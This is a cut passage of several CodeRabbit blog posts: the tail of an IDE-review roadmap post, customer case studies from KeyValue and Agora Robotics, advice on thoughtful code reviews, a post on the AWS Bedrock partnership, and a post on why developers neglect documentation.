design our UI from the ground up in VS Code. At first, we thought of adding our own comments panel where we would add comments similar to how we do it in SCMs. But we realized that a comments panel wasn’t the right way to do real-time comments. We decided to integrate our comments more directly into the editor so that users get the comment where the code is. We find this is a more IDE-native strategy and creates a better UX flow. ### Working with users’ preferred AI coding agents Because so many developers use AI coding tools in their IDE, we wanted to take advantage of that to give devs choice around how to resolve a suggestion from CodeRabbit. We give users the option to resolve the issue with code we suggest or to pass over the suggestion to the users’ preferred AI coding assistant to suggest code. All in one click. ## What’s next on the roadmap? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/76e1c8c06b7502211715677a92044688a09d35e710016f7657ab63d0b87f22b5_1cae44da03.png) We might have launched version 1.0 of our IDE reviews but we have a number of things in our roadmap to make them even more helpful. ### Near term * **User-level Learnings:** We’ll be adding the ability to add [Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) or give feedback on suggestions so our agent automatically learns the suggestions you like and don’t like. We currently have [org-wide Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) in the SCM but want to extend this feature to individual developers who want to add custom Learnings that will only apply to them. * **Tools:** We’re planning on bringing the [30+ tools](https://docs.coderabbit.ai/tools/) you can use in our PR reviews to our IDE reviews. If you’re already running linters in your IDE, you’ll be able to do it all in one review with CodeRabbit. Look out for this addition later in the year. ### Longer-term * **Web Queries:** We plan to integrate our context enhancing features into our IDE tool so your code is bug-free with lesser false positives and your reviews are always up-to-date on versions, library documentations and vulnerabilities, even if the LLM isn’t. * **Docstrings:** Want to create [Docstrings](https://docs.coderabbit.ai/finishing-touches/docstrings) before you merge? We’ll be adding this feature that’s currently part of our PR reviews to our IDE reviews in the future. * **More codebase awareness:** We will be bringing in additional data points to create more codebase aware reviews in the IDE. ***Try our free*** [***IDE reviews here***](https://coderabbit.link/rxv5kZ8)***. Interested in tackling similar challenges?*** [***Join our team.***](https://coderabbit.link/ecTThbN)

How KeyValue Software Systems Leveraged AI to Accelerate Code Reviews

Manpreet Kaur — Wed, 05 Mar 2025 00:00:00 GMT

**At a Glance:** **Primary contact:** [Shanimol. E.M, Engineerin](https://www.linkedin.com/in/shanimol-e-m-3b596955/)g [Manager](https://www.linkedin.com/in/shanimol-e-m-3b596955/) [**Comp**](https://www.linkedin.com/in/shanimol-e-m-3b596955/)**any:** [KeyValue Software Systems](https://www.keyvalue.systems/) [**Coding languages used:** Golang, Flutter,](https://www.keyvalue.systems/) Next.js, React, Python **Challenge:** Time-consuming, inconsistent, and error-prone manual code reviews slow development. **Key Result:** More than 50% reduced code review time, enabling faster releases and improved efficiency. [KeyValue Software Systems](https://www.keyvalue.systems/) is a premier global AI-first product development hub and the best delivery engine in the Indian subcontinent. With a 400+ strong engineering team, the company has built and delivered 120+ products for 80+ companies over the last eight years. Its expertise spans industries, geographies, and technologies, leveraging AI to create high-value software solutions. At KeyValue, Shani leads a 20-member engineering team developing a fintech product to help tech startup operators, founders, and investors create and manage wealth. The team focuses on delivering a secure, fast, and reliable user experience. ### **Business Challenges – Manual Code Reviews Slowing Down Development** As a product development partner for fast-moving startups and scaleups, KeyValue Software Systems prioritizes **rapid feature releases**. However, manual code reviews have created bottlenecks in the development process. **Key Challenges:** **Time-consuming manual Reviews**: Engineers spent excessive time reviewing PRs, creating bottlenecks that slowed QA delivery and reduced overall productivity. **Inconsistent Review Quality**: Varying skill levels led to overlooked best practices and inconsistent naming conventions. **Security Risks in FinTech**: Given the security-sensitive nature of FinTech applications, ensuring strong security, compliance, and vulnerability detection before deployment was critical. **Engineering Bandwidth Constraints**: Senior developers spend too much time reviewing code instead of focusing on high-impact development and architectural improvements. **Missed Bugs & Hidden Errors**: Manual reviews often miss subtle bugs, ambiguous code, and performance inefficiencies, leading to potential unexpected behavior. **Sprint Execution Inefficiencies**: Teams spend excessive time in the push-review-fix-release loop, limiting their ability to focus on strategic, high-impact engineering challenges. ### **Key CodeRabbit Features That Transformed Development Workflow:** **1\. Always-ON AI Code Reviews:** * CodeRabbit functions like a 24/7 senior engineer, ensuring prompt and consistent code reviews without relying on peer availability. **2\. Automated PR Summaries and Suggestions:** * Clear and concise summaries for every PR, making it easier for reviewers to understand changes at a glance. * Intelligent refactoring suggestions ensure optimized, maintainable code. * Detects edge cases and recommends error-handling improvements, identifying potential issues early. **3\. Security:** * Automatically flags security risks and helps meet security compliance requirements. **4\. Bug Detection:** * AI-driven bug identification highlights potential issues in the code before they go live. * Automated error-handling reviews improved overall application stability. **5\. Context-Aware Code Reviews with Linear Integration:** * Seamless integration with Linear allows CodeRabbit to fetch relevant ticket details, providing context-aware PR reviews. * Leverages ticket descriptions to ensure code changes align with business requirements and intended functionality. **6\. Junior Engineer Onboarding:** * AI highlighted naming conventions and coding standards and reinforced best practices. * Reduced senior engineers' having to correct common beginner mistakes. **7\. Increased Sprint Productivity:** * Time saved in code reviews was used to take on strategically important tasks. * More efficient sprint execution due to less time in review cycles. **8\. Built-In AI Chatbot for Interactive PR Discussions:** * CodeRabbit’s intelligent chatbot allows engineers to interact with PR comments in real time, making it easier to clarify suggestions, request refinements, and resolve issues efficiently. * It simplifies code review discussions by providing quick explanations and justifications for AI-generated review comments. “CodeRabbit has completely transformed our code review process, making it faster, more consistent, and less manual. It has saved us more than 50% of the time we used to spend on manual reviews, allowing our engineers to focus on building great products” - [Shanimol. E.M](https://www.linkedin.com/in/shanimol-e-m-3b596955/), Engineering Manager, [KeyValue Software Systems](https://www.keyvalue.systems/) ### **Conclusion** CodeRabbit has improved the way KeyValue teams work. By automating code reviews, CodeRabbit enabled engineers to deliver high-quality products faster while maintaining security and best practices. With CodeRabbit rolling out to more teams within the company, KeyValue is using AI to set a new standard for development efficiency. **Get Started with CodeRabbit** If your team wants to supercharge its development workflow, CodeRabbit makes AI-powered code reviews seamless and efficient. You can try CodeRabbit in under 5 minutes; no credit card is required. Get started today.

How to Do Thoughtful Code Reviews

Ankur Tyagi — Mon, 03 Mar 2025 00:00:00 GMT

Good code reviews take thoughtful, unambiguous communication. This can be a big challenge as a team grows. Each developer creates additional lines of code. This is why well-documented code review guidelines, processes ,and principles are so important. ![More developers, more lines of communication.](https://victorious-bubble-f69a016683.media.strapiapp.com/9cf99cf84e6474c19a202356af44b3f423bb94e2df8528a1516db83a21235ae4_fd54b44ca0.jpg) Code review is a critical step in the software development lifecycle that you shouldn't omit. However, how code review should be done has been debated for a long time. > Every organization approaches code reviews in their own way. In some organizations, everyone reviews the code. Others prefer to assign code review to one team member (usually a more senior engineer than the author). Big tech companies usually have an internal code review tool to manage the entire process. Google has Critique & Gerrit, and Meta has Phabricator. Also, since Generative AI and AI Code Assistants became very popular, many organizations have adopted them to automate code reviews. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2a4eb767af6dead75642989134233009ea9e1d89279227b4318f73a3914fba03_3e6b3e4ed0.png) Similar to how organizations approach code review in their way, software engineers also have opinions on how they want code review done. These opinions might differ from their reality at work. This shows a difference between how engineers would like to do [code reviews](https://en.wikipedia.org/wiki/Code_review) and how their workplace makes them do it. We came across some opinions from engineers on X about code review. We think these are worth looking at. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7b82ef2664cb53882a4f72d6a2d8200e90a24ae7fa52dbe166c81d2f5cf49ee4_adac4ab307.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/07a45af7d635e24e38f1f89a944722ea6f65df7792e76613512a3a8e6e768bb2_4577b006cf.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e96eea2c4a9245e3b71706516f1c17743bdce09f0666f0ea9251ffe2140dccfc_67ba0ffd96.png) Every one of these engineers has a valid reason for their opinion. And some with real-world experience to buttress why they hold such opinions. Based on the diverse takes we have seen on the subject of code review, we pretty much grouped them into: * The “**I like code review**” group consists of people who want code review regardless of the pass threshold set. They will adjust to any code review process structure set at their workplace. * The “**I like code review but**” group. Folks in this group want code review but with certain conditions, such as “**I like code review but don’t force me to write in your code style**,” “**I like code review, but we should automate with an AI agent**,“ etc. * The “**I don’t think code review is necessary**” group (not a popular group). Some people in this group believe that code review is just a way for someone to make you conform to their standards. Again, each group has a good reason for their choice. Our focus in this post is to share tips on thoughtful code reviews. First, let’s quickly detour to the code review blame culture. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6ca523e03f2c82303e4f8ae52059f3e6839140f9abd9f7d3803875d644b0099e_aa7024a9d5.png) ## The Code Review Blame Culture It is a known fact that the code review process can be a tedious exercise involving multiple back-and-forths between an author and a reviewer. If not properly managed, it can create an environment where the focus shifts to finding faults in code and apportioning blame when a bug escapes review. we call it the blame culture. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8d207c4c5e89b4fdbac0586410100a9fcaaf0a89127e6e4bca197e4b989dc72_33e6d139e3.png) > Code review is about ensuring code quality, consistency, and best practices. Authors should not view code reviews as antagonistic. Similarly, feedback from reviewers should be issue-based. The blame culture thrives when teams behave contrary to these—personal attacks, nitpicking, defensiveness, etc. If a bug manages to escape code review, what comes to mind should not be “**Whose is to blame?**” but “**What went wrong and how can we fix it?**.” We call it the team mindset. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a92ea9469d4b465f76165c40f6d117afed0944325c3f65612f32d6d268d9a81a_646b5b4fa3.png) > The blame culture is toxic and should have no place in code review. Now that we have established that, let’s move on to how to do code reviews thoughtfully. ## How to Do Thoughtful Code Reviews > There is no one-size-fits-all approach to code review. However, teams should approach it with transparent processes and standards. A thoughtful code review goes beyond finding errors to promoting knowledge sharing, collaboration, and empathy. The following are some elements that we think a thoughtful code review should have: ### Do a preliminary self-review (own your work) You should first self-review your code. Before clicking “***Create Pull Request***,” give your work a second look. No, this doesn’t mean you don’t trust or believe in yourself. It means that you understand that you can make mistakes. More importantly, it means you value the reviewer’s time and effort. > Check your code and tests for errors and bugs before submitting it for peer review. Additionally, focus on **high-risk vs. low-risk changes** during self-review. * **High-risk changes**—those affecting critical business logic, security, or performance—deserve extra scrutiny. * **Low-risk changes**\- such as minor refactors or docs updates, can be reviewed with a lighter touch. By prioritizing your review efforts, you help ensure that major issues are caught early while keeping the process efficient. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c996dab4c81c919d5762239b395d408ce8fd026b569b60e0f85b4f4640dc4bf6_4034850e86.png) ### Smaller PRs It is hard (almost impossible) to thoroughly review a codebase with large changes. Nobody wants to review 1,000+ lines of code in one go. It’s exhausting, error-prone, and delays feedback. Break big changes into **small, logical PRs**—it keeps things moving faster. Big tech like Google, Facebook, and every well-run engineering team encourages the small commits culture and prevent merge hell. > **Rule of thumb:** If a PR takes more than **10-15 minutes** to review, it’s too big. ### Write/review with empathy Consider the feelings of others when you write or review code. Following best practices and writing clean code means you care about who takes a look at your work. Empathy is putting yourself in the shoes of the other person. > For example, feedback such as “I find this function a bit unusual. Do you mind giving it a second look?” is more empathetic than “This is a bad function. You should do a rewrite.” PR comments shouldn't be personal, or vague. ❌ You didn't check for a null value. ✅ This input value could be null, causing a server error. If null, a client error should be thrown. > The second: - targets the code, NOT the person - is clear about a suggested improvement. Good code reviews aren’t just about finding bugs. They’re about **helping your team write better code.** If your feedback sounds like an attack, nobody will listen. ### Automate code review processes No one likes going through the same thing over and over again. You easily get bored and frustrated doing so. Frankly speaking, code review cycles can get you into that bored and frustrated spot. This is why you should try to abstract away redundant manual steps. Use [automation tools](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit) to streamline your workflows. Linters are great for automating parts of your code review process. > You could also employ AI Code agents to automate certain levels of code review. The human element will always be important in code review (at least for the foreseeable future). While linters and formatters have helped us follow agreed practices by teams, using AI-based Code Review automation tools, you can further leverage AI-powered Linting to suppress noise and bubble up impactful issues. > Note: AI based tools prone to hallucinations. Fine-tuning or instructing the LLMs on how you want the code to be reviewed may be essential in some cases, for a desired output. ### Agree to a standard as a team We all have our own biases as humans. Each of us has a certain way we like things to be like. And that’s okay. However, we should not impose our biases (or preferences) on others. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6d68bb27c186147a2b2c4bd7833ceae96d373e4b86736e3c2a7d9c87ac5096fe_74dfc27450.png) > Do not impose your code style on others. ### Set the pass threshold Approving code should not be “**as the reviewer wishes.**” Your team should set a clear pass threshold. Set the minimum standards code submissions must meet to merge in the main codebase. > Examples of the pass threshold you could set are: performance benchmark, security, and readability. [GitHub Checks](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) can help you automate and enforce pass thresholds. By requiring specific checks to pass before a pull request can be merged, you ensure consistent code quality and speed up the code review process. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1c9b4680fe0e561a5c9e087601c3e0896a78850d678bd2201f3a2a23130f69cd_94e134488a.png) ### Clear feedback Provide specific and actionable feedback. Where you don’t have the right context, ask questions and don't make assumptions. A good code review isn’t just criticism. it’s a collaboration\*\*.\*\* Be specific, actionable, and ask questions when you’re unsure. * **Bad:** *This is wrong. Fix it.* * **Better:** *This approach might have a race condition. Could we use a lock here instead?* You don’t have to solve every problem—just help the author think through their solution. ## Summary Code review is a time-consuming process. Approaching it thoughtfully makes it easier for all parties involved. If done right, it can help your team improve code quality, ensure consistency, and promote collaboration, openness, and a learning culture. How does your organization do it? And how do you want it done?

Agora Robotics & CodeRabbit: AI-Powered Code Reviews Streamline Robotics Software

Manpreet Kaur — Mon, 24 Feb 2025 00:00:00 GMT

**At a Glance:** **Primary contact:** [Paul Popescu, CEO and](https://www.linkedin.com/in/holopix?miniProfileUrn=urn%3Ali%3Afs_miniProfile%3AACoAAAu5jqkBRk1gMQq3snD3HJzAYSDWgLQeFlo) [Ioana Calen, COO](https://www.linkedin.com/in/ioana-calen-510a6455/overlay/about-this-profile/) **Primary technology:** Python, C++ **Challenge:** Manual code reviews are a bottleneck in the development of critical robotics software [Agora Robotics](https://www.agorarobotics.com/), a leading provider of autonomous mobile robots (AMRs) for warehouse automation, struggled to maintain software development velocity while maintaining code quality. With a distributed development team that used complex robotics software, the company deployed CodeRCodeRabbit'sowered code review platform to improve the speed of shipping code—with CodeRabbit, code quality and dev productivity for their autonomous navigation and control systems significantly enhanced, allowing the team to focus more on innovation while consistently upholding the highest standards of code quality and safety. ### **Key Challenges: Small team struggles to ship features at the speed of customer demands** Manual code reviews are time-consuming and inconsistent, often consuming up to 30% of a senior developer's time, which significantly slows down feature development velocity. The code for robotics algorithms and safety-critical systems demands experienced software developers for a thorough review. The robotics development team was small, and resources were limited; consequently, the review process became a bottleneck. Bugs caught in production resulted in costly downtime and safety issues, making fixes difficult when the robots were deployed in remote locations. Typos and minor errors can slip through in large PRs. Inadequate error handling introduces hard-to-detect bugs. Feedback can be delayed during busy development cycles. ### **Improving Dev Productivity with AI Code Reviews** Agora Robotics deployed CodeRabbit'sode review solution for robotics. The onboarding was done in less than one business day, and it took less than another business day to integrate the solution into their existing GitHub workflow and receive helpful AI code review recommendations. Their codebase in GitHub has specific rules for merging code into the "main” branch." Tho”e rules sometimes introduced bugs that would appear early in the manual review. Still, sometimes, they only appear in QA when a specific part of the code is triggered. This would slow down their testing process as it would need a new PR to be created, reviewed, and merged with fixes. With CodeRabbit, they can avoid this scenario and catch all the bugs at the review stage. **Key Features Used:** CodeRabbit not only offers a fresh perspective on your code—improving it through clean code principles and fostering new habits for cleaner, more maintainable code—but also boosts collaboration through a suite of powerful features: * **Cross-team code review coordination:** Seamlessly manage reviews without waiting for individual engineer availability. * **Automated documentation:** Simplify understanding of critical code functionality with AI-generated insights. * **CI/CD and DevOps integration:** Implement improvements quickly through smooth pipeline integration. * **Enhanced safety checks:** Benefit from suggestions refining error handling and code robustness. * **Adaptive learning:** Leverage team comments and tailor AI recommendations to fit project-specific best practices. **Automated Code Analysis:** Real-time AI analysis of complex robotics algorithms while streamlining workflows by eliminating tedious manual tasks. * **Sequence diagrams:** Generate to illustrate clearly how new features integrate into the system. These combined capabilities ensure that CodeRabbit enhances code quality and accelerates development workflows. They also found the Sequence Diagrams generated by CodeRabbit useful, especially in the case of feature PRs when lots of new "strings" get attached to their system. Also, the fact that CodeRabbit learns from their comments made the AI take user feedback into account for the next time the same code block comes up. They found the chat feature to be a nice touch, detecting robotics-specific code patterns and potential issues. **Results and Impact:** Reduction of code review time by at least 20%. Fewer PR iterations accelerate the development cycle. Decrease in production bug incidents. Knowledge transfer within the team and AI feedback on best practices enhance overall coding habits. Improved documentation coverage across the codebase. Enhanced capacity to meet rapid deployment schedules. *"CodeRabbit has transformed our development process by providing intelligent, automated code reviews that understand the complexities of robotics software. Our team can now focus on innovation while maintaining the highest code quality and safety standards."* — [**Paul Popescu**](https://www.linkedin.com/in/holopix?miniProfileUrn=urn%3Ali%3Afs_miniProfile%3AACoAAAu5jqkBRk1gMQq3snD3HJzAYSDWgLQeFlo)**, CEO of** [**Agora Robotics**](https://www.agorarobotics.com/)**.** ### **Conclusion:** CodeRabbit's successful deployment at Agora Robotics shows what is possible when AI code reviews are applied to highly technical domains. The platform's ability to understand and validate complex robotic code while maintaining the highest safety standards has proven extremely valuable to its development team. ### **Start Your Journey with CodeRabbit** Let us help your development team see the power of AI-driven code reviews. Setup takes less than 5 minutes, and no credit card is required. [**Begin Your Free Trial**](https://app.coderabbit.ai/login?free-trial&) today and see how CodeRabbit can transform your development workflow. Questions? Our [**support team**](https://www.coderabbit.ai/contact-us/support) is ready to assist.

Accelerating Code Delivery: How CodeRabbit and AWS Use AI to Revolutionize Code Reviews

Sahil Mohan Bansal — Thu, 20 Feb 2025 00:00:00 GMT

In today’s AI-powered software development landscape, the rapid pace of code creation—fueled by large language models (LLMs) and ever-advancing Gen AI reasoning capabilities—has become both a blessing and a challenge for engineering teams. While teams can generate code faster than ever, thanks to the new AI coding assistants on the market, the ability to ship code out to production has become limited by the tedious and slow manual code review process. Manual code reviews have become a bottleneck, delaying feature releases and sometimes compromising code quality by missing critical bugs and errors. Enter [**CodeRabbit**](https://www.coderabbit.ai/)—the industry’s leading AI Code Review platform that helps automate the first pass of code reviews and ultimately allows engineering teams to ship better quality code faster and safer. In partnership with AWS, especially by using Amazon Bedrock to integrate with Anthropic’s Claude Sonnet 3.5, CodeRabbit is transforming how software development teams manage code quality, speed up PR merge time, and reduce bugs in production. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dda461a725ef9814a9d415e631d85208bfabb252f4cf0bf1d9ed30ded8199367_eea0f0e406.png) **The Bottleneck of Manual Code Reviews** Manual code reviews are tedious, error-prone, and reliant on the availability of other engineers who may not have expertise in the same coding language that they are being asked to review. Interpersonal team dynamics also play their way into the code review process with nitpicks that slow code the software release cycle. In the age of AI coding assistants, manual code reviews are like driving a passenger car on an F1 race track. You need to change the engine under the hood to adapt to the environment. * **Increased Code Volume:** With generative AI driving code creation, the sheer amount of code being generated is skyrocketing, and manual code reviews simply cannot keep up. * **Manual Review Limitations:** Human error will occasionally creep in, especially when engineers are overworked and simply can’t keep up with the rapid pace of software development. Manual reviews are tedious and error-prone. * **Impact on Delivery:** The delay caused by manual reviews slows down code ship velocity, hindering the release of new features. Engineering teams may also be called upon to fix bugs that slipped through to production. * **Developer Morale:** let’s face it, at the end of the day, what engineers enjoy the most is building new features and not writing documentation or inserting unit tests. Time spent in manual code reviews is time taken away from what engineers would rather do. ### **The CodeRabbit Solution: Automated AI Code Reviews** **CodeRabbit** is designed to address these manual code review challenges head-on. Here’s how: * **Merge PRs Faster:** By automating the first pass of the code review process, CodeRabbit significantly reduces the turnaround time from sending the PR to merging it. Customers can merge PRs 4x faster using AI code reviews. * **Free Up Dev Time:** Eliminate repetitive and boring tasks such as documentation or unit test insertion. Reduce the number of dev cycles and number of engineers involved in reviews from 2 to just one engineer. * **Improve Code Quality:** Automated reviews not only catch bugs faster but also enforce coding best practices and provide refactor suggestions, eventually leading to more robust and maintainable code. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/43e3cec74dc4594353f86720b277a40edd58417f60f685d0a1df4c20747a7233_0a8233968b.png?key=Km8inSeTiuyCG1KeoAijSzlL) Here are some of the key features of how CodeRabbit delivers these benefits: * **Automated Error Detection** Automated AI code reviews detect errors or bugs that manual reviews may miss. Get rid of tedious and error-prone manual reviews and watch your team’s bug count go down in days. * **1-Click Committable Fixes** CodeRabbit goes beyond just identifying issues in your code. Commit the recommended changes into a pull request with just one 1-click directly from your existing Git workflow. * **Linters / SAST Integrations** Out-of-the-box integrations with 20+ Linters & SAST. Zero-configuration changes are required, saving your team’s time and effort. AI models coupled with Linters deliver much more accurate reviews. * **Automated Learnings** AI code reviews continuously improve over time with automated learning. Users can also fine-tune the learnings through a chat interface. Your code reviews are customized to your coding standards. * **Dashboards and Reports** Visibility into dev productivity improvement with metrics such as the number of issues fixed and human time saved. Automated reports deliver the state of your repos, including PR summaries, release notes, etc. **Review Customization** To tailor the AI code reviews to your project's specific needs, you can set up path-based custom code review instructions or use advanced AST-based custom rules. ### **Powering Innovation with AWS** CodeRabbit is excited to partner with AWS to bring cutting-edge AI code reviews to its customers. CodeRabbit supports Anthropic Claude with Amazon Bedrock, utilizing the generative AI capabilities along with the cloud infrastructure and services provided by AWS. Amazon Bedrock stands at the forefront of enterprise AI innovation, offering a comprehensive solution that democratizes access to advanced generative AI capabilities. This fully managed service seamlessly integrates high-performing foundation models and LLMs from leading AI companies through a unified API, along with a broad set of other capabilities enabling organizations to build and scale sophisticated AI applications without the undifferentiated heavy lifting of managing infrastructure. Amazon Bedrock's marketplace comes with over 100 popular models, complemented by powerful features that optimize both cost and performance. These include: * Prompt Caching * Intelligent Prompt Routing * Model Distillation What sets Amazon Bedrock apart is its emphasis on enterprise-grade security, private customization capabilities, and seamless integration with the broader AWS ecosystem. By addressing critical concerns around data sovereignty, scalability, and responsible AI deployment, Amazon Bedrock is helping organizations across industries transform their operations and drive innovation. ### CodeRabbit Deployment Models ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f4820c489a5beb6a804c043ed04e7ab65ab5fd935337fc074caf3face7465db_1a590ab54e.png) To meet the needs of different customers, CodeRabbit provides two different deployment models: **SaaS:** quick and easy to get started. Just takes two clicks to integrate with your preferred Git platform. No infrastructure to manage immediate value with AI Code Reviews. **Self-Hosted:** CodeRabbit provides a container image that you can run on your AWS EKS or ECS containers. You host the infrastructure, and all your data stays in your AWS VPC to help you meet even the most stringent security and compliance needs. Customers can subscribe to CodeRabbit SaaS with a credit card and pay monthly or annually. Customers can also use our [AWS Marketplace](https://aws.amazon.com/marketplace/seller-profile) listing to pay for the CodeRabbit self-hosted solution. Get in touch with our sales team at [sales@coderabbit.ai](mailto:sales@coderabbit.ai) for volume discounts for the self-hosted deployment model. **Real-world Benefits of AI-Powered Software Development** As AI models powering modern software development environments continue to evolve, the need for rapid, reliable code reviews will only grow so that engineering teams are not blocked from shipping code because of the manual effort spent in code reviews. AWS and CodeRabbit AI Code Review solution represents a significant step forward in this domain, and the proof, as they say, is in the pudding built by our customers. Here is what David Deal, Sr Director of Engineering at The Linux Foundation,n had to say about AI Code Reviews: *“CodeRabbit has proven invaluable in uncovering discrepancies between our documentation and actual test coverage. Highlighting inconsistencies like missing null checks or mismatched value ranges prevented numerous potential issues.”* *And here is what William Wallace, CEO of BuiltRight, had to say about implementing AI Code Reviews:* *"We found CodeRabbit through Product Hunt and gave it a try. It was super quick and easy to get started - took us less than 10 minutes. AI code reviews helped us save about 25% of the total time that developers were spending on manual code reviews, freeing up crucial bandwidth from the code review cycles”* You can read more about their use case and benefits in [our case study](https://www.coderabbit.ai/case-studies). **Join the Revolution** Whether you’re a startup or a large enterprise, CodeRabbit is here to help you ship better quality code faster and safer. Start your [14-day free trial](https://coderabbit.ai/) with CodeRabbit today. You can pay for CodeRabbit through the [AWS Marketplace](https://aws.amazon.com/marketplace/pp/prodview-wkkkre4fgelwq) utilizing your existing AWS spend commitments and join the revolution of automated AI code reviews!

Challenges Developers Face in Creating API and Code Documentation

Aravind Putrevu — Thu, 13 Feb 2025 00:00:00 GMT

Most developers prioritize writing code over documentation. It's not that documentation is difficult, but in a deadline-driven environment, writing docs often takes a back seat, much like fixing that production bug on Friday afternoon or cleaning up untested code. But why is that? Why do documentation tasks consistently get pushed down in our development priorities? In this blog, we explore the psychological quirks, technical hurdles, and organizational pressures that contribute to this great documentation dilemma. We'll take a look at the impact of poor documentation on software development projects and discuss some strategies for escaping the undocumented situation. ## Before that, Documentation and Categories: * Internal documentation: This is for the folks who work directly with the codebase – your fellow developers, testers, and anyone else involved in the nitty-gritty of the project. It's like the secret sauce recipe, providing guidance on best practices, technical instructions, and how to navigate those complex algorithms that only you and a select few need to understand. * External documentation: This is for the outside world – the users, customers, and developers who use your software or integrate with it; Think API references, user manuals, and those all-important Wiki's that can make or break a project's adoption. In this blog we will focus specifically on Internal Developer Documentation that other developers can use to debug and learn about the codebase. ## The Agile Reality: "We'll Document It Later" At a time when two-week sprints and daily deployments are the norm, documentation often becomes the first casualty. We've all been there – the sprint is ending, the PR needs to be merged, and there's pressure to ship the feature. "I'll add the API docs in the next sprint", we tell ourselves while knowing deep down that "next sprint" might never come. The reality of agile development makes this worse. When choosing between updating API documentation or tackling the next story in the backlog, guess which one usually wins? Story points and velocity metrics rarely account for documentation work. It's like technical debt, but quieter – until it isn't. > Let us know if you are a dev team, that runs separate docs sprint! Here's what typically happens: ```typescript // Sprint 1: Initial implementation async function processOrder(orderId) { // TODO: Add API docs ... } // Sprint 3: Added new parameter async function processOrder(orderId, options) { // TODO: Update API docs ... } // Sprint 5: Breaking change async function processOrder(orderId, options, callback) { // TODO: Really need to update those docs... ... } ``` The "we'll document it later" mentality has real consequences. That TODO comment becomes a permanent fixture, the API spec remains unclear, and six months later, your team spends hours in a meeting room trying to figure out why the payment service is sending callbacks that the order service isn't expecting. > Have you ever ran a CTRL+F with TODO in your IDE? You are an Elite engineering team if you have <10 occurrences of this search. (assuming that your team does TODO comments ;)) ## What stops developers from documenting Code? A common misconception in software development is that clean, readable code eliminates the need for documentation. While descriptive function signatures and variable names help, they can’t tell the complete story of why certain decisions were made. ### The "It's Obvious" Syndrome > "It's obvious – the function name tells you everything!" Even the cleanest code can't tell the whole story. Sure, good variable names and clear functions help, but they can't explain why you chose that specific approach, what edge cases you considered, or what future maintainers should watch out for. Clean code might tell you how it works, but documentation tells you why it works that way. ### The Moving Target Problem Modern development moves fast. Imagine your codebase is constantly evolving. New features are being added, APIs are changing, and code is being refactored. Meanwhile, your documentation starts getting stale. What was accurate last month might be misleading today, and downright wrong by next quarter. This documentation drift happens naturally. Developers are moving fast, making many changes to code each day. Each small code change can make a piece of documentation obsolete. And it's not just about API endpoints, class methods change, function signatures evolve, and database schemas shift. Before you know it, your once accurate documentation becomes a minefield of outdated information. For example: * That API endpoint you documented now has three new required parameters * The error codes section hasn't been updated in six months * The example code snippets don't even compile anymore * The authentication flow has completely changed, but the docs still show the old way This is why keeping documentation in sync with code is such a challenge - it's not a one-and-done task, it's a constant battle against drift. > While the code will not necessarily stop working with documentation drift, unit tests must stay current for the code to work. Well-written tests do more than verify functionality - they demonstrate proper API usage through concrete examples. By writing meaningful test cases instead of focusing solely on coverage metrics, developers create an always-accurate reference for how the code should behave. Though tests shouldn't be the only form of documentation, they provide reliable, self-updating examples that complement written docs. ### Psychological Factors (Because we're complex creatures, too) Let's be honest - there's more to our documentation problem than just time constraints. Writing good documentation challenges us in ways that coding doesn't. First, it requires a different mindset. When coding, we talk to computers in precise, logical terms. But documentation? We need to communicate with humans, anticipate their questions, and explain complex concepts clearly. Many developers find this mental switch challenging. Then there's the perfectionism trap. We fear our documentation won't be good enough. What if we explain something wrong? What if we miss important details? This fear often leads to procrastination - after all, no documentation is better than wrong documentation, right? (Spoiler: it's not) There's also the motivation factor. Pushing code and seeing it work gives us an immediate sense of achievement. Documentation doesn't provide that same instant gratification. The benefits often only become apparent weeks or months later, when someone (including future you) needs to understand how something works. It's a mix of unfamiliar skills, fear of imperfection, and delayed rewards that makes documentation feel like such a burden. ## The Impact of Poor Documentation The consequences of poor documentation can be far-reaching, impacting not only individual developers but the entire project. * Reduced productivity & increased code maintenance - developers spend an insane amount of time ramping up on code, leading to delays. * Increased bugs and errors - Misinterpreted code, leading to more bugs and errors. * Hindered collaboration - Poor documentation makes it difficult for developers to work together. * Loss of knowledge - As team members leave, their undocumented knowledge goes with them. ## What Actually Works In the order of priority, here is a list that worked for us. Use Meaningful Comments: There is no time to do the full documentation cycle; start with comments. Use comments to explain the "why" behind your code, not just the "what." Think of them as little love notes to your future self (or the poor soul who must maintain your code after you). Keep it Concise and Up-to-Date: No one wants to wade through a wall of text. Keep your documentation (even if they are comments) concise, focused, and to the point. And most importantly, keep it up-to-date! Outdated documentation is worse than no documentation at all. It's like giving someone a map to a city that no longer exists – frustrating and ultimately useless. Embrace AI Dev Documentation Tools: Modern AI tools can now automatically generate and maintain code documentation - from Docstrings in Python to JSDoc comments in JavaScript and Javadoc in Java. They can analyze your code, understand its structure, and suggest meaningful documentation that explains parameters, return types, and function purposes. While they won't replace thoughtful dev documentation, they can help jumpstart the process and keep reference documentation up to date. Making use of README: Most teams treat README files in private repos as an afterthought - "it's internal, who needs it?" But treating your private repo's README with the same care as you would an open-source project can save hours of onboarding time. Include the project's purpose, how dev docs are written, common gotchas, and links to key internal resources like API docs, runbooks, and architecture diagrams. Think of all the questions a new team member would ask in their first week - that's what belongs in your README. Use Visual Aids: Lastly, make an architecture or sequence diagram if you can’t write a full page of developer documentation. A picture is worth a thousand words, especially when it comes to explaining complex concepts. Use diagrams, flowcharts, and other visual aids to make your dev documentation more engaging and easily understood. Ultimately, great documentation comes down to building it into your team's DNA. Start small by making doc updates part of your PR checklist, discuss documentation in code reviews, and recognize team members who leave helpful comments or update guides. Over time you'll see a shift from "I'll document it later" to "this isn't done until it's documented." ## 